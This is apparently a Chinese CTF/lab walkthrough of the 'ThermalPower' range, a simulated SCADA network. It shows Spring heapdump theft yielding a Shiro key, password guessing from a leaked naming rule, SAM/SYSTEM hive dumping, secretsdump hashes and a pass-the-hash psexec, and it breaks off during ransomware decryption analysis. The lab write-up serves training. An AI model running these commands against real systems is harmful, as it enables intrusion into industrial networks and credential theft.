lvzhouhang

春秋云镜-ThermalPower

  • ~28.92K 字
  1. 1. FLAG01
  2. 2. FLAG02
  3. 3. FLAG03
  4. 4. FLAG04

FLAG01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# ../../pentest/fscan/fscan2 -h 39.98.122.145
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-05-01 23:10:46] [INFO] 暴力破解线程数: 1
[2025-05-01 23:10:46] [INFO] 开始信息扫描
[2025-05-01 23:10:46] [INFO] 最终有效主机数量: 1
[2025-05-01 23:10:46] [INFO] 开始主机扫描
[2025-05-01 23:10:46] [INFO] 有效端口数量: 233
[2025-05-01 23:10:46] [SUCCESS] 端口开放 39.98.122.145:22
[2025-05-01 23:10:47] [SUCCESS] 服务识别 39.98.122.145:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-05-01 23:10:49] [SUCCESS] 端口开放 39.98.122.145:8080
[2025-05-01 23:10:54] [SUCCESS] 服务识别 39.98.122.145:8080 => [http]
[2025-05-01 23:10:56] [INFO] 存活端口数量: 2
[2025-05-01 23:10:56] [INFO] 开始漏洞扫描
[2025-05-01 23:10:56] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-05-01 23:10:56] [SUCCESS] 网站标题 http://39.98.122.145:8080 状态码:302 长度:0      标题:无标题 重定向地址: http://39.98.122.145:8080/login;jsessionid=C10B39BA0BC886E7924F52A8BA23B5B6
[2025-05-01 23:10:57] [SUCCESS] 网站标题 http://39.98.122.145:8080/login;jsessionid=C10B39BA0BC886E7924F52A8BA23B5B6 状 态码:200 长度:2936   标题:火创能源监控画面管理平台
[2025-05-01 23:11:00] [SUCCESS] 目标: http://39.98.122.145:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-05-01 23:11:00] [SUCCESS] 目标: http://39.98.122.145:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        links:https://github.com/LandGrey/SpringBootVulExploit
[2025-05-01 23:11:03] [SUCCESS] 扫描已完成: 3/3

可以扫有8080端口有一个poc-yaml-spring-actuator-heapdump-file,先将heapdump文件下载下来 

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# wget  http://39.98.122.145:8080/actuator/heapdump
--2025-05-01 23:13:13--  http://39.98.122.145:8080/actuator/heapdump
Connecting to 39.98.122.145:8080... connected.
HTTP request sent, awaiting response... 200
Length: 31181349 (30M) [application/octet-stream]
Saving to: ‘heapdump’

heapdump                      100%[=================================================>]  29.74M  1.36MB/s    in 21s

2025-05-01 23:13:35 (1.41 MB/s) - ‘heapdump’ saved [31181349/31181349]

然后用工具进行分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
spring.thymeleaf.encoding = UTF-8
management.endpoint.health.show-details = always
spring.thymeleaf.cache = true
spring.thymeleaf.content-type = text/html
server.port = 8080
spring.thymeleaf.check-template = true
management.endpoints.jmx.exposure.include = *

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-166-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.8080.2227855515484347988
java.version = 1.8.0_392
user.home = /root
user.language = en
PID = 620
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
file.separator = /
catalina.base = /tmp/tomcat.8080.2227855515484347988
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.class.path = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
sun.arch.data.model = 64
login.configuration.provider = sun.security.provider.ConfigFile
catalina.useNaming = false
user.timezone =
security.overridePropertiesFile = true
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /root
user.language = en
java.specification.vendor = Oracle Corporation
en = UTF-8
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
jdk.tls.alpnCharset = ISO_8859_1
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
ssl.KeyManagerFactory.algorithm = SunX509
file.separator = /
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
ja = UTF-8
java.awt.headless = true
com.xyz.foo.level = SEVERE
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
policy.provider = sun.security.provider.PolicyFile
user.name = root
policy.url.1 = file:${java.home}/lib/security/java.policy
path.separator = :
fr = UTF-8
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
os.version = 5.4.0-166-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
policy.ignoreIdentityScope = false
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
file.encoding = UTF-8
spring.beaninfo.ignore = true
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
java.vm.name = OpenJDK 64-Bit Server VM
jdk.sasl.disabledMechanisms =
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.io.tmpdir = /tmp
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.8080.2227855515484347988
java.version = 1.8.0_392
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 620
java.vm.specification.name = Java Virtual Machine Specification
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
catalina.base = /tmp/tomcat.8080.2227855515484347988
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode, sharing
java.vendor = Private Build
keystore.type = jks
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN
krb5.kdc.bad.policy = tryLast

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

有用的是这里,存在一个shirokey,然后shiro一把梭,注入内存马

1
2
3
4
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

flag01在根目录

FLAG02

写一个公钥进去,ssh连接,上传一个fscan再做一个代理

fscan扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
root@security:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:2f:44:6e brd ff:ff:ff:ff:ff:ff
    inet 172.22.17.213/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315359102sec preferred_lft 315359102sec
    inet6 fe80::216:3eff:fe2f:446e/64 scope link
       valid_lft forever preferred_lft forever
root@security:~# ./fscan2 -h 172.22.17.213/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-05-02 11:23:19] [INFO] 暴力破解线程数: 1
[2025-05-02 11:23:19] [INFO] 开始信息扫描
[2025-05-02 11:23:19] [INFO] CIDR范围: 172.22.17.0-172.22.17.255
[2025-05-02 11:23:20] [INFO] 生成IP范围: 172.22.17.0.%!d(string=172.22.17.255) - %!s(MISSING).%!d(MISSING)
[2025-05-02 11:23:20] [INFO] 解析CIDR 172.22.17.213/24 -> IP范围 172.22.17.0-172.22.17.255
[2025-05-02 11:23:20] [INFO] 最终有效主机数量: 256
[2025-05-02 11:23:20] [INFO] 开始主机扫描
[2025-05-02 11:23:20] [SUCCESS] 目标 172.22.17.6     存活 (ICMP)
[2025-05-02 11:23:20] [SUCCESS] 目标 172.22.17.213   存活 (ICMP)
[2025-05-02 11:23:23] [INFO] 存活主机数量: 2
[2025-05-02 11:23:23] [INFO] 有效端口数量: 233
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:445
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:139
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:135
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:21
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:80
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.213:22
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.213:8080
[2025-05-02 11:23:23] [SUCCESS] 服务识别 172.22.17.6:21 => [ftp] 产品:Microsoft ftpd 系统:Windows Banner:[220 Microsoft FTP Service.]
[2025-05-02 11:23:23] [SUCCESS] 服务识别 172.22.17.213:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-05-02 11:23:28] [SUCCESS] 服务识别 172.22.17.6:445 =>
[2025-05-02 11:23:28] [SUCCESS] 服务识别 172.22.17.6:139 =>  Banner:[.]
[2025-05-02 11:23:28] [SUCCESS] 服务识别 172.22.17.213:8080 => [http]
[2025-05-02 11:23:28] [SUCCESS] 服务识别 172.22.17.6:80 => [http]
[2025-05-02 11:24:28] [SUCCESS] 服务识别 172.22.17.6:135 =>
[2025-05-02 11:24:28] [INFO] 存活端口数量: 7
[2025-05-02 11:24:28] [INFO] 开始漏洞扫描
[2025-05-02 11:24:28] [INFO] 加载的插件: findnet, ftp, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-05-02 11:24:28] [SUCCESS] 网站标题 http://172.22.17.6        状态码:200 长度:661    标题:172.22.17.6 - /
[2025-05-02 11:24:28] [SUCCESS] NetBios 172.22.17.6     WORKGROUP\WIN-ENGINEER
[2025-05-02 11:24:28] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.17.6
主机名: WIN-ENGINEER
发现的网络接口:
   IPv4地址:
      └─ 172.22.17.6
[2025-05-02 11:24:28] [SUCCESS] 网站标题 http://172.22.17.213:8080 状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.17.213:8080/login;jsessionid=AE53E4C807EB6DEB9B204E7B4201FDFF
[2025-05-02 11:24:28] [SUCCESS] 匿名登录成功!
[2025-05-02 11:24:28] [SUCCESS] 网站标题 http://172.22.17.213:8080/login;jsessionid=AE53E4C807EB6DEB9B204E7B4201FDFF 状 态码:200 长度:2936   标题:火创能源监控画面管理平台
[2025-05-02 11:24:29] [SUCCESS] 目标: http://172.22.17.213:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-05-02 11:24:30] [SUCCESS] 目标: http://172.22.17.213:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        links:https://github.com/LandGrey/SpringBootVulExploit
1
2
3
4
5
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:445
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:139
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:135
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:21
[2025-05-02 11:23:23] [SUCCESS] 端口开放 172.22.17.6:80

先看ftp,可以匿名登陆但是中文会乱码,和80端口的文件是一样的,随便在一个服务下载就行

内部通知.docx告诉我们了密码规则

1
2
登陆账户设置:
   为方便管理和标准化,登陆账户名将采用姓名全称的小写拼音形式。例如,张三的账户名为zhangsan,工号为0801。初始密码将由账户名+@+工号组成,例如,zhangsan@0801。

还存在一个通讯录,根据通讯录里的信息和这个密码规则可以构造,有好多账号都可以登陆,任意一个就可以

1
chenhua/chenhua@0813

rdp连接,scad.txt还给了一个管理员的密码

1
2
3
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

但是这不是这台主机的管理员密码,题目提示

1
2
关卡剧情:
尝试接管 SCADA 工程师的个人 PC,并通过滥用 Windows 特权组提升至系统权限。

查看当前用户组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\chenhua>net user chenhua
用户名                 chenhua
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2023/12/26 0:47:03
密码到期               从不
密码可更改             2023/12/26 0:47:03
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2025/5/2 11:36:30

可允许的登录小时数     All

本地组成员             *Backup Operators     *Remote Desktop Users
                       *Users
全局组成员             *None
命令成功完成。

我们在Backup Operators组内,但是没给用户分配SeBackup特权,可以用注册表 SAM 转储提权,直接转储 sam 和 system 

1
2
3
4
PS C:\users\chenhua\Desktop> reg save hklm\sam sam.hive
操作成功完成。
PS C:\users\chenhua\Desktop> reg save hklm\system system.hive
操作成功完成。

然后用secretsdump导出hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# impacket-psexec  -hashes aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279 Administrator@172.22.17.6

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 172.22.17.6.....
[*] Found writable share ADMIN$
[*] Uploading file odkqcbIH.exe
[*] Opening SVCManager on 172.22.17.6.....
[*] Creating service CFcL on 172.22.17.6.....
[*] Starting service CFcL.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.2113]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����


C:\Windows\system32> type C:\Users\Administrator\flag\flag02.txt

FLAG03

之前给的排上用场了,用fscan扫一下

1
2
3
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@security:~# ./fscan2 -h 172.22.26.1/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-05-02 12:42:59] [INFO] 暴力破解线程数: 1
[2025-05-02 12:42:59] [INFO] 开始信息扫描
[2025-05-02 12:42:59] [INFO] CIDR范围: 172.22.26.0-172.22.26.255
[2025-05-02 12:42:59] [INFO] 生成IP范围: 172.22.26.0.%!d(string=172.22.26.255) - %!s(MISSING).%!d(MISSING)
[2025-05-02 12:42:59] [INFO] 解析CIDR 172.22.26.1/24 -> IP范围 172.22.26.0-172.22.26.255
[2025-05-02 12:42:59] [INFO] 最终有效主机数量: 256
[2025-05-02 12:42:59] [INFO] 开始主机扫描
[2025-05-02 12:42:59] [SUCCESS] 目标 172.22.26.11    存活 (ICMP)
[2025-05-02 12:43:02] [INFO] 存活主机数量: 1
[2025-05-02 12:43:02] [INFO] 有效端口数量: 233
[2025-05-02 12:43:02] [SUCCESS] 端口开放 172.22.26.11:135
[2025-05-02 12:43:02] [SUCCESS] 端口开放 172.22.26.11:139
[2025-05-02 12:43:02] [SUCCESS] 端口开放 172.22.26.11:80
[2025-05-02 12:43:02] [SUCCESS] 端口开放 172.22.26.11:1433
[2025-05-02 12:43:02] [SUCCESS] 端口开放 172.22.26.11:445
[2025-05-02 12:43:07] [SUCCESS] 服务识别 172.22.26.11:139 =>  Banner:[.]
[2025-05-02 12:43:07] [SUCCESS] 服务识别 172.22.26.11:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.]
[2025-05-02 12:43:07] [SUCCESS] 服务识别 172.22.26.11:445 =>
[2025-05-02 12:43:08] [SUCCESS] 服务识别 172.22.26.11:80 => [http]

远程桌面连接,登陆后会自动启动软件,然后开启锅炉得到flag

FLAG04

桌面上有一个解密你的文件.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
** 您的文件已被加密 **

很抱歉,您的计算机中的文件已被加密。要解锁您的文件,您需要支付赎金。

-----------------------------------------
| 注意事项                               |
-----------------------------------------
| 1. 不要试图删除或修改加密文件。        |
| 2. 支付赎金前,不要尝试恢复文件。      |
| 3. 请在规定时间内支付赎金。            |
-----------------------------------------

要获取解密密钥和进一步的说明,请访问我们的支付网站:
[支付网站链接]

如果无法访问支付网站,请通过电子邮件联系我们:
contact@ransomware.com

赎金金额:2比特币

-----------------------------------------
| 警告:尝试恢复文件或报警将导致永久丢失文件。|
-----------------------------------------

比特币支付地址:1ABcDefGhijxLxnxpxrsxUvwxYZabcdEf

桌面上还给了两个.lock文件,附件还给了两个key,c盘还有一个Lockyou.exe

用dnSpy反编译可以看到加密逻辑根据 locky 勒索软件家族加解密逻辑和 .NET 逆向代码,解密思路如下:

  • 首先用 privateKey 对加密的 encryptedAesKey进行 RSA 解密,得到 AES_KEY

  • 再用 AES_KEY 对加密的文件 ScadaDB.sql.locky 解密,得到 ScadaDB.sql

    通过工具,将 privateKey 从 XML 格式转换为 PEM 格式,得到 PRIVATE_KEY

通过工具,将 privateKey 从 XML 格式转换为 PEM 格式,得到 PRIVATE_KEY

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
-----BEGIN PRIVATE KEY-----
